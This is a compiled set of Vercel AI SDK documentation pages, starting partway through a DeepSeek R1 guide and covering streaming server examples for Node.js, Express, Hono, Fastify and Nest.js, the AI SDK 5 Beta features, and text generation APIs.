  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: fireworks('accounts/fireworks/models/deepseek-r1'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoning, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

Or to use Groq's deepseek-r1-distill-llama-70b model:

import { groq } from '@ai-sdk/groq';
import {
  generateText,
  wrapLanguageModel,
  extractReasoningMiddleware,
} from 'ai';

// middleware to extract reasoning tokens
const enhancedModel = wrapLanguageModel({
  model: groq('deepseek-r1-distill-llama-70b'),
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

const { reasoning, text } = await generateText({
  model: enhancedModel,
  prompt: 'Explain quantum entanglement.',
});

When using DeepSeek-R1 series models with third-party providers like Together AI, we recommend using the startWithReasoning option in the extractReasoningMiddleware function, as they tend to bypass thinking patterns.

Model Provider Comparison

You can use DeepSeek R1 with the AI SDK through various providers. Here's a comparison of the providers that support DeepSeek R1:

Provider	Model ID	Reasoning Tokens
DeepSeek	`deepseek-reasoner`
Fireworks	`accounts/fireworks/models/deepseek-r1`	Requires Middleware
Groq	`deepseek-r1-distill-llama-70b`	Requires Middleware
Azure	`DeepSeek-R1`	Requires Middleware
Together AI	`deepseek-ai/DeepSeek-R1`	Requires Middleware
FriendliAI	`deepseek-r1`	Requires Middleware
LangDB	`deepseek/deepseek-reasoner`	Requires Middleware

Building Interactive Interfaces

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.

Let's explore building a chatbot with Next.js, the AI SDK, and DeepSeek R1:

In a new Next.js application, first install the AI SDK and the DeepSeek provider:

Then, create a route handler for the chat endpoint:

import { deepseek } from '@ai-sdk/deepseek';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: deepseek('deepseek-reasoner'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    sendReasoning: true,
  });
}

Finally, update the root page (app/page.tsx) to use the useChat hook:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, error } = useChat();

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.reasoning && <pre>{message.reasoning}</pre>}
          {message.content}
        </div>
      ))}
      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Limitations

While DeepSeek R1 models are powerful, they have certain limitations:

No tool-calling support: DeepSeek R1 cannot directly interact with APIs or external tools.
No object generation support: DeepSeek R1 does not support structured object generation. However, you can combine it with models that support structured object generation (like gpt-4o-mini) to generate objects. See the structured object generation with a reasoning model recipe for more information.

Get Started

Ready to dive in? Here's how you can begin:

Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
Use ready-to-deploy AI templates at vercel.com/templates?type=ai.

DeepSeek R1 opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.

title: Guides description: Learn how to build AI applications with the AI SDK

Guides

These use-case specific guides are intended to help you build real applications with the AI SDK.

title: Node.js HTTP Server description: Learn how to use the AI SDK in a Node.js HTTP server tags: ['api servers', 'streaming']

Node.js HTTP Server

You can use the AI SDK in a Node.js HTTP server to generate text and stream it to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/node-http-server

Data Stream

You can use the pipeDataStreamToResponse method to pipe the stream data to the server response.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeDataStreamToResponse(res);
}).listen(8080);

Sending Custom Data

pipeDataStreamToResponse can be used to send custom data to the client.

import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  // immediately start streaming the response
  pipeDataStreamToResponse(res, {
    execute: async dataStreamWriter => {
      dataStreamWriter.writeData('initialized call');

      const result = streamText({
        model: openai('gpt-4o'),
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      result.mergeIntoDataStream(dataStreamWriter);
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });
}).listen(8080);

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { createServer } from 'http';

createServer(async (req, res) => {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
}).listen(8080);

Troubleshooting

Streaming not working when proxied

title: Express description: Learn how to use the AI SDK in an Express server tags: ['api servers', 'streaming']

Express

You can use the AI SDK in an Express server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/express

Data Stream

You can use the pipeDataStreamToResponse method to pipe the stream data to the server response.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeDataStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Sending Custom Data

pipeDataStreamToResponse can be used to send custom data to the client.

import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/stream-data', async (req: Request, res: Response) => {
  // immediately start streaming the response
  pipeDataStreamToResponse(res, {
    execute: async dataStreamWriter => {
      dataStreamWriter.writeData('initialized call');

      const result = streamText({
        model: openai('gpt-4o'),
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      result.mergeIntoDataStream(dataStreamWriter);
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Text Stream

You can send a text stream to the client using pipeTextStreamToResponse.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import express, { Request, Response } from 'express';

const app = express();

app.post('/', async (req: Request, res: Response) => {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  result.pipeTextStreamToResponse(res);
});

app.listen(8080, () => {
  console.log(`Example app listening on port ${8080}`);
});

Troubleshooting

Streaming not working when proxied

title: Hono description: Example of using the AI SDK in a Hono server. tags: ['api servers', 'streaming']

Hono

You can use the AI SDK in a Hono server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/hono

Data Stream

You can use the toDataStream method to get a data stream from the result and then pipe it to the response.

import { openai } from '@ai-sdk/openai';
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
import { stream } from 'hono/streaming';

const app = new Hono();

app.post('/', async c => {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  // Mark the response as a v1 data stream:
  c.header('X-Vercel-AI-Data-Stream', 'v1');
  c.header('Content-Type', 'text/plain; charset=utf-8');

  return stream(c, stream => stream.pipe(result.toDataStream()));
});

serve({ fetch: app.fetch, port: 8080 });

Sending Custom Data

createDataStream can be used to send custom data to the client.

import { openai } from '@ai-sdk/openai';
import { serve } from '@hono/node-server';
import { createDataStream, streamText } from 'ai';
import { Hono } from 'hono';
import { stream } from 'hono/streaming';

const app = new Hono();

app.post('/stream-data', async c => {
  // immediately start streaming the response
  const dataStream = createDataStream({
    execute: async dataStreamWriter => {
      dataStreamWriter.writeData('initialized call');

      const result = streamText({
        model: openai('gpt-4o'),
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      result.mergeIntoDataStream(dataStreamWriter);
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });

  // Mark the response as a v1 data stream:
  c.header('X-Vercel-AI-Data-Stream', 'v1');
  c.header('Content-Type', 'text/plain; charset=utf-8');

  return stream(c, stream =>
    stream.pipe(dataStream.pipeThrough(new TextEncoderStream())),
  );
});

serve({ fetch: app.fetch, port: 8080 });

Text Stream

You can use the textStream property to get a text stream from the result and then pipe it to the response.

import { openai } from '@ai-sdk/openai';
import { serve } from '@hono/node-server';
import { streamText } from 'ai';
import { Hono } from 'hono';
import { stream } from 'hono/streaming';

const app = new Hono();

app.post('/', async c => {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  c.header('Content-Type', 'text/plain; charset=utf-8');

  return stream(c, stream => stream.pipe(result.textStream));
});

serve({ fetch: app.fetch, port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Fastify description: Learn how to use the AI SDK in a Fastify server tags: ['api servers', 'streaming']

Fastify

You can use the AI SDK in a Fastify server to generate and stream text and objects to the client.

Examples

The examples start a simple HTTP server that listens on port 8080. You can e.g. test it using curl:

curl -X POST http://localhost:8080

Full example: github.com/vercel/ai/examples/fastify

Data Stream

You can use the toDataStream method to get a data stream from the result and then pipe it to the response.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  // Mark the response as a v1 data stream:
  reply.header('X-Vercel-AI-Data-Stream', 'v1');
  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.toDataStream({ data }));
});

fastify.listen({ port: 8080 });

Sending Custom Data

createDataStream can be used to send custom data to the client.

import { openai } from '@ai-sdk/openai';
import { createDataStream, streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/stream-data', async function (request, reply) {
  // immediately start streaming the response
  const dataStream = createDataStream({
    execute: async dataStreamWriter => {
      dataStreamWriter.writeData('initialized call');

      const result = streamText({
        model: openai('gpt-4o'),
        prompt: 'Invent a new holiday and describe its traditions.',
      });

      result.mergeIntoDataStream(dataStreamWriter);
    },
    onError: error => {
      // Error messages are masked by default for security reasons.
      // If you want to expose the error message to the client, you can do so here:
      return error instanceof Error ? error.message : String(error);
    },
  });

  // Mark the response as a v1 data stream:
  reply.header('X-Vercel-AI-Data-Stream', 'v1');
  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(dataStream);
});

fastify.listen({ port: 8080 });

Text Stream

You can use the textStream property to get a text stream from the result and then pipe it to the response.

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import Fastify from 'fastify';

const fastify = Fastify({ logger: true });

fastify.post('/', async function (request, reply) {
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: 'Invent a new holiday and describe its traditions.',
  });

  reply.header('Content-Type', 'text/plain; charset=utf-8');

  return reply.send(result.textStream);
});

fastify.listen({ port: 8080 });

Troubleshooting

Streaming not working when proxied

title: Nest.js description: Learn how to use the AI SDK in a Nest.js server tags: ['api servers', 'streaming']

Nest.js

You can use the AI SDK in a Nest.js server to generate and stream text and objects to the client.

Examples

The examples show how to implement a Nest.js controller that uses the AI SDK to stream text and objects to the client.

Full example: github.com/vercel/ai/examples/nest

Data Stream

You can use the pipeDataStreamToResponse method to get a data stream from the result and then pipe it to the response.

import { Controller, Post, Res } from '@nestjs/common';
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post()
  async example(@Res() res: Response) {
    const result = streamText({
      model: openai('gpt-4o'),
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeDataStreamToResponse(res);
  }
}

Sending Custom Data

pipeDataStreamToResponse can be used to send custom data to the client.

import { Controller, Post, Res } from '@nestjs/common';
import { openai } from '@ai-sdk/openai';
import { pipeDataStreamToResponse, streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post('/stream-data')
  async streamData(@Res() res: Response) {
    pipeDataStreamToResponse(res, {
      execute: async dataStreamWriter => {
        dataStreamWriter.writeData('initialized call');

        const result = streamText({
          model: openai('gpt-4o'),
          prompt: 'Invent a new holiday and describe its traditions.',
        });

        result.mergeIntoDataStream(dataStreamWriter);
      },
      onError: error => {
        // Error messages are masked by default for security reasons.
        // If you want to expose the error message to the client, you can do so here:
        return error instanceof Error ? error.message : String(error);
      },
    });
  }
}

Text Stream

You can use the pipeTextStreamToResponse method to get a text stream from the result and then pipe it to the response.

import { Controller, Post, Res } from '@nestjs/common';
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
import { Response } from 'express';

@Controller()
export class AppController {
  @Post()
  async example(@Res() res: Response) {
    const result = streamText({
      model: openai('gpt-4o'),
      prompt: 'Invent a new holiday and describe its traditions.',
    });

    result.pipeTextStreamToResponse(res);
  }
}

Troubleshooting

Streaming not working when proxied

title: AI SDK by Vercel description: The AI SDK is the TypeScript toolkit for building AI applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

AI SDK

The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications and agents with React, Next.js, Vue, Svelte, Node.js, and more.

Why use the AI SDK?

Integrating large language models (LLMs) into applications is complicated and heavily dependent on the specific model provider you use.

The AI SDK standardizes integrating artificial intelligence (AI) models across supported providers. This enables developers to focus on building great AI applications, not waste time on technical details.

For example, here’s how you can generate text with various models using the AI SDK:

The AI SDK has two main libraries:

AI SDK Core: A unified API for generating text, structured objects, tool calls, and building agents with LLMs.
AI SDK UI: A set of framework-agnostic hooks for quickly building chat and generative user interface.

Model Providers

The AI SDK supports multiple model providers.

Templates

We've built some templates that include AI SDK integrations for different use cases, providers, and frameworks. You can use these templates to get started with your AI-powered application.

Starter Kits

Feature Exploration

Frameworks

Generative UI

Security

Join our Community

If you have questions about anything related to the AI SDK, you're always welcome to ask our community on GitHub Discussions.

`llms.txt` (for Cursor, Windsurf, Copilot, Claude etc.)

You can access the entire AI SDK documentation in Markdown format at ai-sdk.dev/llms.txt. This can be used to ask any LLM (assuming it has a big enough context window) questions about the AI SDK based on the most up-to-date documentation.

Example Usage

For instance, to prompt an LLM with questions about the AI SDK:

Copy the documentation contents from ai-sdk.dev/llms.txt
Use the following prompt format:

Documentation:
{paste documentation here}
---
Based on the above documentation, answer the following:
{your question}

title: AI SDK 5 Beta description: Get started with the Beta version of AI SDK 5.

Announcing AI SDK 5 Beta

Beta Version Guidance

The AI SDK 5 Beta is intended for:

New projects where you can adopt the latest patterns from the start
Trying out new features and giving us feedback on the developer experience
Experimenting with migrations from v4 to understand the upgrade path
Development and testing environments where you can iterate quickly

Short on time? Wait for the stable release. We're focusing on polish and migration tooling improvements.

For production applications: Experiment with migrations in development, but avoid fully migrating production systems. Use this beta period to understand the changes and prepare your migration strategy.

What to Expect in Beta

No major breaking changes - the architecture is stable
Minor breaking changes possible - we may refine APIs for critical bugfixes
Bug fixes and DX improvements - active development continues

Your feedback during this beta phase directly shapes the final stable release. Share your experiences through GitHub issues.

Installation

To install the AI SDK 5 Beta, run the following command:

# replace with your provider and framework
npm install ai@beta @ai-sdk/openai@beta @ai-sdk/react@beta

What's new in AI SDK 5?

AI SDK 5 is a redesign of the AI SDK's protocol and architecture based on everything we learned over the last two years of real-world usage. We also modernized the UI and protocols that have remained largely unchanged since AI SDK v2/3, to create a strong foundation for the future.

Why a new specification (LanguageModelV2)?

When we originally designed the v1 protocol over a year ago, the standard interaction pattern with language models was text in, text or tool call out. Today's LLMs go beyond text and tool calls, generating reasoning, sources, images and more. New use cases like computer-using agents introduce a fundamentally different approach to interacting with language models that made it impossible to support in a unified approach with our original architecture.

We needed a protocol designed for this new reality. While this is a breaking change that we take seriously, it provided an opportunity to rebuild the foundation and add new features.

New Features

LanguageModelV2 - new redesigned architecture
Message Overhaul - new UIMessage and ModelMessage types
Server-Sent Events (SSE) - new standardised protocol for sending UI messages to the client
Agentic Control - new primitives for building agentic systems
Enhanced useChat Architecture - improved state management with transport system

`LanguageModelV2`

LanguageModelV2 represents a complete redesign of how the AI SDK communicates with language models, adapting to the increasingly complex outputs modern AI systems generate. The new LanguageModelV2 treats all LLM outputs as content parts, enabling consistent handling of text, images, reasoning, sources, and other response types. It has:

Content-First Design - Rather than separating text, reasoning, and tool calls, everything is represented as ordered content parts in a unified array
Improved Type Safety - The new LanguageModelV2 provides better TypeScript type guarantees, making it easier to work with different content types
Extensibility - Adding support for new model capabilities requires no changes to the core structure

Message Overhaul

AI SDK 5 introduces a completely redesigned message system with two message types that address the dual needs of what you render in your UI and what you send to the model. Context is crucial for effective language model generations, and these message types serve distinct purposes:

UIMessage represents the complete conversation history for your interface, preserving all message parts (text, images, data), metadata (creation timestamps, generation times), and UI state.
ModelMessage is optimized for sending to language models, considering token input constraints. It strips away UI-specific metadata and irrelevant content.

With this change, you must explicitly convert your UIMessages to ModelMessages before sending them to the model.

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: openai('gpt-4o'),
    messages: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

The new message system makes several highly requested features possible:

Type-safe Message Metadata - Add structured information per message
Type-safe Tool Calls - Improved type safety when defining and using tools in your messages
New Stream Writer - Stream any part type (reasoning, sources, etc.) retaining proper order
Data Parts - Stream type-safe arbitrary data parts for dynamic UI components

Type-safe Tool Calls

AI SDK 5 introduces type-safe tool calls in UI messages. Instead of generic tool-invocation types, tool parts use specific naming: tool-${toolName}. This provides better type safety and makes it easier to handle many tools in your UI.

// Generic tool-invocation type
{
  message.parts.map(part => {
    if (part.type === 'tool-invocation') {
      return <div>{part.toolInvocation.toolName}</div>;
    }
  });
}

// Type-safe tool parts with specific names
{
  message.parts.map(part => {
    switch (part.type) {
      case 'tool-getWeatherInformation':
        return <div>Getting weather...</div>;
      case 'tool-askForConfirmation':
        return <div>Asking for confirmation...</div>;
    }
  });
}

Message metadata

Metadata allows you to attach structured information to individual messages, making it easier to track details like response time, token usage, or model specifications. This information can enhance your UI with contextual data without embedding it in the message content itself.

To add metadata to a message, first define the metadata schema:

export const exampleMetadataSchema = z.object({
  duration: z.number().optional(),
  model: z.string().optional(),
  totalTokens: z.number().optional(),
});

export type ExampleMetadata = z.infer<typeof exampleMetadataSchema>;

Then add the metadata using the message.metadata property on the toUIMessageStreamResponse() utility:

import { openai } from '@ai-sdk/openai';
import { convertToModelMessages, streamText, UIMessage } from 'ai';
import { ExampleMetadata } from './example-metadata-schema';

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const startTime = Date.now();
  const result = streamText({
    model: openai('gpt-4o'),
    prompt: convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse({
    messageMetadata: ({ part }): ExampleMetadata | undefined => {
      // send custom information to the client on start:
      if (part.type === 'start') {
        return {
          model: 'gpt-4o', // initial model id
        };
      }

      // send additional model information on finish-step:
      if (part.type === 'finish-step') {
        return {
          model: part.response.modelId, // update with the actual model id
          duration: Date.now() - startTime,
        };
      }

      // when the message is finished, send additional information:
      if (part.type === 'finish') {
        return {
          totalTokens: part.totalUsage.totalTokens,
        };
      }
    },
  });
}

Finally, use the metadata type with useChat and render the (type-safe) metadata in your UI:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport, UIMessage } from 'ai';
import { ExampleMetadata } from './api/chat/example-metadata-schema';

type MyMessage = UIMessage<ExampleMetadata>;

export default function Chat() {
  const { messages } = useChat<MyMessage>({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div>
      {messages.map(message => (
        <div key={message.id} className="whitespace-pre-wrap">
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.metadata?.duration && (
            <div>Duration: {message.metadata.duration}ms</div>
          )}
          {message.metadata?.model && (
            <div>Model: {message.metadata.model}</div>
          )}
          {message.metadata?.totalTokens && (
            <div>Total tokens: {message.metadata.totalTokens}</div>
          )}
        </div>
      ))}
    </div>
  );
}

UIMessageStream

The UI Message Stream enables streaming any content parts from the server to the client. With this stream, you can send structured data like custom sources from your RAG pipeline directly to your UI. The stream writer is a utility that makes it easy to write to this message stream.

const stream = createUIMessageStream({
  execute: writer => {
    // stream custom sources
    writer.write({
      type: 'source',
      value: {
        type: 'source',
        sourceType: 'url',
        id: 'source-1',
        url: 'https://example.com',
        title: 'Example Source',
      },
    });
  },
});

On the client, these will be added to the ordered message.parts array.

Data Parts

The new stream writer enables a type-safe way to stream arbitrary data from the server to the client and display it in your UI.

You can create and stream custom data parts on the server:

// On the server
const stream = createUIMessageStream({
  execute: writer => {
    // Initial update
    writer.write({
      type: 'data-weather', // Custom type
      id: toolCallId, // ID for updates
      data: { city, status: 'loading' }, // Your data
    });

    // Later, update the same part
    writer.write({
      type: 'data-weather',
      id: toolCallId,
      data: { city, weather, status: 'success' },
    });
  },
});

On the client, you can render these parts with full type safety:

{
  message.parts
    .filter(part => part.type === 'data-weather') // type-safe
    .map((part, index) => (
      <Weather
        key={index}
        city={part.data.city} // type-safe
        weather={part.data.weather} // type-safe
        status={part.data.status} // type-safe
      />
    ));
}

Data parts appear in the message.parts array along with other content, maintaining the proper ordering of the conversation. You can update parts by referencing the same ID, enabling dynamic experiences like collaborative artifacts.

Enhanced useChat Architecture

AI SDK 5 introduces a new useChat architecture with transport-based configuration. This design makes state management and API integration flexible, allowing you to configure backend protocols without rewriting application logic.

The new useChat hook uses a transport system for better modularity:

Transport Configuration – configure API endpoints and request handling through transport objects
Enhanced State Management – improved message handling with the new UIMessage format
Type Safety – stronger TypeScript support throughout the chat lifecycle

Configure useChat with the transport system:

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';

const { messages, sendMessage } = useChat({
  transport: new DefaultChatTransport({
    api: '/api/chat', // your chat endpoint
    headers: { 'Custom-Header': 'value' },
  }),
  maxSteps: 5,
});

Server-Sent Events (SSE)

AI SDK 5 uses Server-Sent Events (SSE) instead of a custom streaming protocol. SSE is a common web standard for sending data from servers to browsers. This switch has several advantages:

Works everywhere - Uses technology that works in all major browsers and platforms
Easier to troubleshoot - See the data stream in browser developer tools
Simpler to build upon - Adding new features is more straightforward
More stable - Built on proven technology that many developers already use

Agentic Control

AI SDK 5 introduces new features for building agents that help you control model behavior more precisely.

prepareStep

The prepareStep function gives you fine-grained control over each step in a multi-step agent. It's called before a step starts and allows you to:

Dynamically change the model used for specific steps
Force specific tool selections for particular steps
Limit which tools are available during specific steps
Examine the context of previous steps before proceeding

const result = await generateText({
  // ...
  experimental_prepareStep: async ({ model, stepNumber, maxSteps, steps }) => {
    if (stepNumber === 0) {
      return {
        // use a different model for this step:
        model: modelForThisParticularStep,
        // force a tool choice for this step:
        toolChoice: { type: 'tool', toolName: 'tool1' },
        // limit the tools that are available for this step:
        experimental_activeTools: ['tool1'],
      };
    }
    // when nothing is returned, the default settings are used
  },
});

This makes it easier to build AI systems that adapt their capabilities based on context and task requirements.

`stopWhen`

The stopWhen parameter lets you define stopping conditions for your agent. Instead of running indefinitely, you can specify exactly when the agent should terminate based on various conditions:

Reaching a maximum number of steps
Calling a specific tool
Satisfying any custom condition you define

const result = generateText({
  // ...
  // stop loop at 5 steps
  stopWhen: stepCountIs(5),
});

const result = generateText({
  // ...
  // stop loop when weather tool called
  stopWhen: hasToolCall('weather'),
});

const result = generateText({
  // ...
  // stop loop at your own custom condition
  stopWhen: maxTotalTokens(20000),
});

These agentic controls form the foundation for building reliable, controllable AI systems that tackle complex problems while remaining within well-defined constraints.

Additional New Features

Tool Output Schema

Tools can now optionally specify an output schema for better type inference and validation:

import { tool } from 'ai';
import { z } from 'zod';

const weatherTool = tool({
  description: 'Get weather information',
  inputSchema: z.object({
    city: z.string(),
  }),
  outputSchema: z.object({
    temperature: z.number(),
    conditions: z.string(),
  }),
  execute: async ({ city }) => ({
    temperature: 72,
    conditions: 'sunny',
  }),
});

Tool Type Inference Helpers

New utility types simplify working with tool types:

import { InferToolInput, InferToolOutput, InferUITool } from 'ai';
import { weatherTool } from './weatherTool';

// Infer input and output types from tool definitions
type WeatherInput = InferToolInput<typeof weatherTool>;
type WeatherOutput = InferToolOutput<typeof weatherTool>;
type WeatherUITool = InferUITool<typeof weatherTool>;

// Use in UI message type definitions
type MyUIMessage = UIMessage<
  never, // metadata type
  UIDataTypes, // data parts type
  {
    weather: WeatherUITool;
  }
>;

OpenAI Provider-Executed Tools

New built-in tools for OpenAI:

import { openai } from '@ai-sdk/openai';

const result = await generateText({
  model: openai('gpt-4.1'),
  tools: {
    file_search: openai.tools.fileSearch(),
    web_search_preview: openai.tools.webSearchPreview({
      searchContextSize: 'high',
    }),
  },
  messages,
});

Available tools:

fileSearch: Search through uploaded documents using OpenAI's file search
webSearchPreview: Web search capabilities (preview feature)

When using provider-defined tools like fileSearch and webSearchPreview, the tool execution results are automatically added to the message history, providing context for subsequent interactions.

This automatic message history inclusion ensures that:

Tool execution context is preserved across conversation turns
Follow-up questions can reference previously searched information
The full conversation flow is maintained for debugging and logging

Enhanced Tool Streaming

Tools now support fine-grained streaming callbacks:

const weatherTool = tool({
  inputSchema: z.object({ city: z.string() }),
  onInputStart: ({ toolCallId }) => {
    console.log('Tool input streaming started:', toolCallId);
  },
  onInputDelta: ({ inputTextDelta, toolCallId }) => {
    console.log('Tool input delta:', inputTextDelta);
  },
  onInputAvailable: ({ input, toolCallId }) => {
    console.log('Tool input ready:', input);
  },
  execute: async ({ city }) => {
    return `Weather in ${city}: sunny, 72°F`;
  },
});

Migration from AI SDK 4.x

Ready to upgrade from AI SDK 4.x to 5.0 Beta? We created a comprehensive migration guide to help you through the process.

The migration involves several key changes:

Updated message format with UIMessage and ModelMessage types
New useChat architecture with transport system
New streaming protocol with Server-Sent Events
Improved type safety and developer experience

View the complete Migration Guide →

The migration guide includes:

Step-by-step upgrade instructions
Detailed examples for each breaking change
Best practices for adopting new features

title: Overview description: An overview of AI SDK Core.

AI SDK Core

Large Language Models (LLMs) are advanced programs that can understand, create, and engage with human language on a large scale. They are trained on vast amounts of written material to recognize patterns in language and predict what might come next in a given piece of text.

AI SDK Core simplifies working with LLMs by offering a standardized way of integrating them into your app - so you can focus on building great AI applications for your users, not waste time on technical details.

For example, here’s how you can generate text with various models using the AI SDK:

AI SDK Core Functions

AI SDK Core has various functions designed for text generation, structured data generation, and tool usage. These functions take a standardized approach to setting up prompts and settings, making it easier to work with different models.

generateText: Generates text and tool calls. This function is ideal for non-interactive use cases such as automation tasks where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.
streamText: Stream text and tool calls. You can use the streamText function for interactive use cases such as chat bots and content streaming.
generateObject: Generates a typed, structured object that matches a Zod schema. You can use this function to force the language model to return structured data, e.g. for information extraction, synthetic data generation, or classification tasks.
streamObject: Stream a structured object that matches a Zod schema. You can use this function to stream generated UIs.

API Reference

Please check out the AI SDK Core API Reference for more details on each function.

title: Generating Text description: Learn how to generate text with the AI SDK.

Generating and Streaming Text

Large language models (LLMs) can generate text in response to a prompt, which can contain instructions and information to process. For example, you can ask a model to come up with a recipe, draft an email, or summarize a document.

The AI SDK Core provides two functions to generate text and stream it from LLMs:

generateText: Generates text for a given prompt and model.
streamText: Streams text from a given prompt and model.

Advanced LLM features such as tool calling and structured data generation are built on top of text generation.

`generateText`

You can generate text using the generateText function. This function is ideal for non-interactive use cases where you need to write text (e.g. drafting email or summarizing web pages) and for agents that use tools.

import { generateText } from 'ai';

const { text } = await generateText({
  model: yourModel,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

You can use more advanced prompts to generate text with more complex instructions and content:

import { generateText } from 'ai';

const { text } = await generateText({
  model: yourModel,
  system:
    'You are a professional writer. ' +
    'You write simple, clear, and concise content.',
  prompt: `Summarize the following article in 3-5 sentences: ${article}`,
});

The result object of generateText contains several promises that resolve when all required data is available:

result.text: The generated text.
result.reasoning: The reasoning text of the model (only available for some models).
result.sources: Sources that have been used as input to generate the response (only available for some models).
result.finishReason: The reason the model finished generating text.
result.usage: The usage of the model during text generation.

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText } from 'ai';

const result = await generateText({
  // ...
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

`streamText`

Depending on your model and prompt, it can take a large language model (LLM) up to a minute to finish generating its response. This delay can be unacceptable for interactive use cases such as chatbots or real-time applications, where users expect immediate responses.

AI SDK Core provides the streamText function which simplifies streaming text from LLMs:

import { streamText } from 'ai';

const result = streamText({
  model: yourModel,
  prompt: 'Invent a new holiday and describe its traditions.',
});

// example: use textStream as an async iterable
for await (const textPart of result.textStream) {
  console.log(textPart);
}

